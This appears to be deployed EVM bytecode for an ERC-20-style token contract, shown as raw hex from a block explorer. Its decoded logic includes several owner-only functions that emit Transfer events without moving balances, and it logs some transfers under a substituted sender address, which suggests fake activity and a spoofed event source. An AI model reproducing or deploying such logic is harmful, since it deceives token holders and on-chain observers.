a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a02576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f990612cf6565b60405180910390fd5b5f5b84849050811015610ac157848482818110610a2257610a21612d14565b5b9050602002016020810190610a379190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610a9857610a97612d14565b5b90506020020135604051610aac9190612753565b60405180910390a38080600101915050610a04565b505050505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b61271081565b5f610afc611ac3565b90505f5b84849050811015610b4a57610b3d82868684818110610b2257610b21612d14565b5b9050602002016020810190610b379190612a59565b85611c8d565b8080600101915050610b00565b5050505050565b610b59611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc90612cf6565b60405180910390fd5b80600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b610c45611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc890612cf6565b60405180910390fd5b5f5b84849050811015610d9057848482818110610cf157610cf0612d14565b5b9050602002016020810190610d069190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610d6757610d66612d14565b5b90506020020135604051610d7b9190612753565b60405180910390a38080600101915050610cd3565b505050505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610de6611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990612cf6565b60405180910390fd5b610e7b5f612082565b565b610e85611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0890612cf6565b60405180910390fd5b5f5b84849050811015610fd057848482818110610f3157610f30612d14565b5b9050602002016020810190610f469190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610fa757610fa6612d14565b5b90506020020135604051610fbb9190612753565b60405180910390a38080600101915050610f13565b505050505050565b610fe0611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461106c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106390612cf6565b60405180910390fd5b80600a8190555050565b600b602052805f5260405f205f915054906101000a900460ff1681565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546110c990612b8e565b80601f01602080910402602001604051908101604052809291908181526020018280546110f590612b8e565b80156111405780601f1061111757610100808354040283529160200191611140565b820191905f5260205f20905b81548152906001019060200180831161112357829003601f168201915b5050505050905090565b611152611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d590612cf6565b60405180910390fd5b5f5b8484905081101561129d578484828181106111fe576111fd612d14565b5b90506020020160208101906112139190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061127457611273612d14565b5b905060200201356040516112889190612753565b60405180910390a380806001019150506111e0565b505050505050565b61271081565b5f8060025f6112b8611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015611372576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161136990612db1565b60405180910390fd5b61138661137d611ac3565b85858403611aca565b600191505092915050565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f6113c96113c2611ac3565b8484611c8d565b6001905092915050565b6113db611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611467576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145e90612cf6565b60405180910390fd5b5f5b848490508110156115265784848281811061148757611486612d14565b5b905060200201602081019061149c9190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106114fd576114fc612d14565b5b905060200201356040516115119190612753565b60405180910390a38080600101915050611469565b505050505050565b611536611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146115c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b990612cf6565b60405180910390fd5b5f1515600760159054906101000a900460ff16151514611617576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160e90612e19565b60405180910390fd5b6001600760156101000a81548160ff021916908315150217905550565b7f000000000000000000000000000000000000000000000000000000000000000081565b611660611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146116ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116e390612cf6565b60405180910390fd5b5f5b848490508110156117ab5784848281811061170c5761170b612d14565b5b90506020020160208101906117219190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061178257611781612d14565b5b905060200201356040516117969190612753565b60405180910390a380806001019150506116ee565b505050505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61183d611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146118c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118c090612cf6565b60405180910390fd5b5f5b84849050811015611988578484828181106118e9576118e8612d14565b5b90506020020160208101906118fe9190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061195f5761195e612d14565b5b905060200201356040516119739190612753565b60405180910390a380806001019150506118cb565b505050505050565b611998611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611a24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1b90612cf6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611a92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a8990612ea7565b60405180910390fd5b611a9b81612082565b50565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2f90612f35565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b9d90612fc3565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611c809190612753565b60405180910390a3505050565b60011515600760149054906101000a900460ff16151514611ce3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cda9061302b565b60405180910390fd5b60011515600760149054906101000a900460ff161515148015611d1857505f1515600760159054906101000a900460ff161515145b15611dd057611d25611093565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480611d905750611d61611093565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b611dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc690613093565b60405180910390fd5b5b5f8190505f73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614158015611e645750611e34611093565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611ea35750611e73611093565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15612071575f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611f25577f0000000000000000000000000000000000000000000000000000000000000000905061200b565b60011515600b5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615151480611fce575060011515600b5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161515145b15611fdb575f905061200a565b7f00000000000000000000000000000000000000000000000000000000000000009050612009600a54612143565b5b5b5f81111561206f575f61271061ffff16828561202791906130b1565b612031919061311f565b9050808461203f919061314f565b925061206d8660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683612152565b505b505b61207c848483612152565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b803a111561214f575f80fd5b50565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036121c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121b7906131f2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361222e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161222590613280565b60405180910390fd5b61223983838361258a565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156122bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122b49061330e565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461234d9190612c79565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603612433578273ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516124269190612753565b60405180910390a3612579565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036125125760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125059190612753565b60405180910390a3612578565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161256f9190612753565b60405180910390a35b5b61258484848461258f565b50505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156125cb5780820151818401526020810190506125b0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6125f082612594565b6125fa818561259e565b935061260a8185602086016125ae565b612613816125d6565b840191505092915050565b5f6020820190508181035f83015261263681846125e6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61266f82612646565b9050919050565b61267f81612665565b8114612689575f80fd5b50565b5f8135905061269a81612676565b92915050565b5f819050919050565b6126b2816126a0565b81146126bc575f80fd5b50565b5f813590506126cd816126a9565b92915050565b5f80604083850312156126e9576126e861263e565b5b5f6126f68582860161268c565b9250506020612707858286016126bf565b9150509250929050565b5f8115159050919050565b61272581612711565b82525050565b5f60208201905061273e5f83018461271c565b92915050565b61274d816126a0565b82525050565b5f6020820190506127665f830184612744565b92915050565b5f805f606084860312156127835761278261263e565b5b5f6127908682870161268c565b93505060206127a18682870161268c565b92505060406127b2868287016126bf565b9150509250925092565b6127c581612665565b82525050565b5f6020820190506127de5f8301846127bc565b92915050565b5f60ff82169050919050565b6127f9816127e4565b82525050565b5f6020820190506128125f8301846127f0565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261283957612838612818565b5b8235905067ffffffffffffffff8111156128565761285561281c565b5b60208301915083602082028301111561287257612871612820565b5b9250929050565b5f8083601f84011261288e5761288d612818565b5b8235905067ffffffffffffffff8111156128ab576128aa61281c565b5b6020830191508360208202830111156128c7576128c6612820565b5b9250929050565b5f805f805f606086880312156128e7576128e661263e565b5b5f6128f48882890161268c565b955050602086013567ffffffffffffffff81111561291557612914612642565b5b61292188828901612824565b9450945050604086013567ffffffffffffffff81111561294457612943612642565b5b61295088828901612879565b92509250509295509295909350565b5f61ffff82169050919050565b6129758161295f565b82525050565b5f60208201905061298e5f83018461296c565b92915050565b5f805f604084860312156129ab576129aa61263e565b5b5f84013567ffffffffffffffff8111156129c8576129c7612642565b5b6129d486828701612824565b935093505060206129e7868287016126bf565b9150509250925092565b6129fa81612711565b8114612a04575f80fd5b50565b5f81359050612a15816129f1565b92915050565b5f8060408385031215612a3157612a3061263e565b5b5f612a3e8582860161268c565b9250506020612a4f85828601612a07565b9150509250929050565b5f60208284031215612a6e57612a6d61263e565b5b5f612a7b8482850161268c565b91505092915050565b5f60208284031215612a9957612a9861263e565b5b5f612aa6848285016126bf565b91505092915050565b5f8060408385031215612ac557612ac461263e565b5b5f612ad28582860161268c565b9250506020612ae38582860161268c565b9150509250929050565b5f819050919050565b5f612b10612b0b612b0684612646565b612aed565b612646565b9050919050565b5f612b2182612af6565b9050919050565b5f612b3282612b17565b9050919050565b612b4281612b28565b82525050565b5f602082019050612b5b5f830184612b39565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680612ba557607f821691505b602082108103612bb857612bb7612b61565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f612c1860288361259e565b9150612c2382612bbe565b604082019050919050565b5f6020820190508181035f830152612c4581612c0c565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f612c83826126a0565b9150612c8e836126a0565b9250828201905080821115612ca657612ca5612c4c565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612ce060208361259e565b9150612ceb82612cac565b602082019050919050565b5f6020820190508181035f830152612d0d81612cd4565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612d9b60258361259e565b9150612da682612d41565b604082019050919050565b5f6020820190508181035f830152612dc881612d8f565b9050919050565b7f436f6e74726163743a2054726164696e67206973206f70656e656421000000005f82015250565b5f612e03601c8361259e565b9150612e0e82612dcf565b602082019050919050565b5f6020820190508181035f830152612e3081612df7565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612e9160268361259e565b9150612e9c82612e37565b604082019050919050565b5f6020820190508181035f830152612ebe81612e85565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612f1f60248361259e565b9150612f2a82612ec5565b604082019050919050565b5f6020820190508181035f830152612f4c81612f13565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612fad60228361259e565b9150612fb882612f53565b604082019050919050565b5f6020820190508181035f830152612fda81612fa1565b9050919050565b7f436f6e74726163743a206e6f7420696e697469616c697a6564210000000000005f82015250565b5f613015601a8361259e565b915061302082612fe1565b602082019050919050565b5f6020820190508181035f83015261304281613009565b9050919050565b7f436f6e74726163743a2074726164696e67206973206e6f7420737461727465645f82015250565b5f61307d60208361259e565b915061308882613049565b602082019050919050565b5f6020820190508181035f8301526130aa81613071565b9050919050565b5f6130bb826126a0565b91506130c6836126a0565b92508282026130d4816126a0565b915082820484148315176130eb576130ea612c4c565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613129826126a0565b9150613134836126a0565b925082613144576131436130f2565b5b828204905092915050565b5f613159826126a0565b9150613164836126a0565b925082820390508181111561317c5761317b612c4c565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6131dc60258361259e565b91506131e782613182565b604082019050919050565b5f6020820190508181035f830152613209816131d0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61326a60238361259e565b915061327582613210565b604082019050919050565b5f6020820190508181035f8301526132978161325e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6132f860268361259e565b91506133038261329e565b604082019050919050565b5f6020820190508181035f830152613325816132ec565b905091905056fea26469706673582212208a25a1ed5668fc9d727a2057dd78b323ceb7b428a7826fa5d8e3258d76fc7df764736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061021a575f3560e01c80637210829711610123578063a9059cbb116100ab578063d632135b1161007a578063d632135b14610606578063dd62ed3e14610622578063f01a4b9914610652578063f2fde38b1461066e578063f887ea401461068a5761021a565b8063a9059cbb14610592578063b22c95e7146105c2578063c9567bf9146105de578063d5abeb01146105e85761021a565b806395d89b41116100f257806395d89b41146104ec57806396784f751461050a578063985bdfd114610526578063a457c2d714610544578063a8aa1b31146105745761021a565b806372108297146104665780637d654c7f14610482578063825e7b831461049e5780638da5cb5b146104ce5761021a565b806339509351116101a65780634ca64b3a116101755780634ca64b3a146103d85780634e148e19146103f45780635d8228131461041057806370a082311461042c578063715018a61461045c5761021a565b806339509351146103505780634022b75e14610380578063470624021461039c5780634c255c97146103ba5761021a565b806323b872dd116101ed57806323b872dd146102a857806325fa0b98146102d857806327c8f835146102f65780632b14ca5614610314578063313ce567146103325761021a565b806306fdde031461021e578063095ea7b31461023c578063158ef93e1461026c57806318160ddd1461028a575b5f80fd5b6102266106a8565b604051610233919061261e565b60405180910390f35b610256600480360381019061025191906126d3565b610738565b604051610263919061272b565b60405180910390f35b610274610755565b604051610281919061272b565b60405180910390f35b610292610768565b60405161029f9190612753565b60405180910390f35b6102c260048036038101906102bd919061276c565b610771565b6040516102cf919061272b565b60405180910390f35b6102e0610863565b6040516102ed919061272b565b60405180910390f35b6102fe610876565b60405161030b91906127cb565b60405180910390f35b61031c61089b565b6040516103299190612753565b60405180910390f35b61033a6108bf565b60405161034791906127ff565b60405180910390f35b61036a600480360381019061036591906126d3565b6108c7565b604051610377919061272b565b60405180910390f35b61039a600480360381019061039591906128ce565b61096e565b005b6103a4610ac9565b6040516103b19190612753565b60405180910390f35b6103c2610aed565b6040516103cf919061297b565b60405180910390f35b6103f260048036038101906103ed9190612994565b610af3565b005b61040e60048036038101906104099190612a1b565b610b51565b005b61042a600480360381019061042591906128ce565b610c3d565b005b61044660048036038101906104419190612a59565b610d98565b6040516104539190612753565b60405180910390f35b610464610dde565b005b610480600480360381019061047b91906128ce565b610e7d565b005b61049c60048036038101906104979190612a84565b610fd8565b005b6104b860048036038101906104b39190612a59565b611076565b6040516104c5919061272b565b60405180910390f35b6104d6611093565b6040516104e391906127cb565b60405180910390f35b6104f46110ba565b604051610501919061261e565b60405180910390f35b610524600480360381019061051f91906128ce565b61114a565b005b61052e6112a5565b60405161053b919061297b565b60405180910390f35b61055e600480360381019061055991906126d3565b6112ab565b60405161056b919061272b565b60405180910390f35b61057c611391565b60405161058991906127cb565b60405180910390f35b6105ac60048036038101906105a791906126d3565b6113b6565b6040516105b9919061272b565b60405180910390f35b6105dc60048036038101906105d791906128ce565b6113d3565b005b6105e661152e565b005b6105f0611634565b6040516105fd9190612753565b60405180910390f35b610620600480360381019061061b91906128ce565b611658565b005b61063c60048036038101906106379190612aaf565b6117b3565b6040516106499190612753565b60405180910390f35b61066c600480360381019061066791906128ce565b611835565b005b61068860048036038101906106839190612a59565b611990565b005b610692611a9e565b60405161069f9190612b48565b60405180910390f35b6060600480546106b790612b8e565b80601f01602080910402602001604051908101604052809291908181526020018280546106e390612b8e565b801561072e5780601f106107055761010080835404028352916020019161072e565b820191905f5260205f20905b81548152906001019060200180831161071157829003601f168201915b5050505050905090565b5f61074b610744611ac3565b8484611aca565b6001905092915050565b600760149054906101000a900460ff1681565b5f600354905090565b5f61077d848484611c8d565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6107c4611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610843576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083a90612c2e565b60405180910390fd5b6108578561084f611ac3565b858403611aca565b60019150509392505050565b600760159054906101000a900460ff1681565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f6012905090565b5f6109646108d3611ac3565b848460025f6108e0611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461095f9190612c79565b611aca565b6001905092915050565b610976611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a02576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f990612cf6565b60405180910390fd5b5f5b84849050811015610ac157848482818110610a2257610a21612d14565b5b9050602002016020810190610a379190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610a9857610a97612d14565b5b90506020020135604051610aac9190612753565b60405180910390a38080600101915050610a04565b505050505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b61271081565b5f610afc611ac3565b90505f5b84849050811015610b4a57610b3d82868684818110610b2257610b21612d14565b5b9050602002016020810190610b379190612a59565b85611c8d565b8080600101915050610b00565b5050505050565b610b59611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc90612cf6565b60405180910390fd5b80600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b610c45611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc890612cf6565b60405180910390fd5b5f5b84849050811015610d9057848482818110610cf157610cf0612d14565b5b9050602002016020810190610d069190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610d6757610d66612d14565b5b90506020020135604051610d7b9190612753565b60405180910390a38080600101915050610cd3565b505050505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610de6611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990612cf6565b60405180910390fd5b610e7b5f612082565b565b610e85611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0890612cf6565b60405180910390fd5b5f5b84849050811015610fd057848482818110610f3157610f30612d14565b5b9050602002016020810190610f469190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610fa757610fa6612d14565b5b90506020020135604051610fbb9190612753565b60405180910390a38080600101915050610f13565b505050505050565b610fe0611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461106c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106390612cf6565b60405180910390fd5b80600a8190555050565b600b602052805f5260405f205f915054906101000a900460ff1681565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546110c990612b8e565b80601f01602080910402602001604051908101604052809291908181526020018280546110f590612b8e565b80156111405780601f1061111757610100808354040283529160200191611140565b820191905f5260205f20905b81548152906001019060200180831161112357829003601f168201915b5050505050905090565b611152611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d590612cf6565b60405180910390fd5b5f5b8484905081101561129d578484828181106111fe576111fd612d14565b5b90506020020160208101906112139190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061127457611273612d14565b5b905060200201356040516112889190612753565b60405180910390a380806001019150506111e0565b505050505050565b61271081565b5f8060025f6112b8611ac3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015611372576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161136990612db1565b60405180910390fd5b61138661137d611ac3565b85858403611aca565b600191505092915050565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f6113c96113c2611ac3565b8484611c8d565b6001905092915050565b6113db611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611467576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145e90612cf6565b60405180910390fd5b5f5b848490508110156115265784848281811061148757611486612d14565b5b905060200201602081019061149c9190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106114fd576114fc612d14565b5b905060200201356040516115119190612753565b60405180910390a380806001019150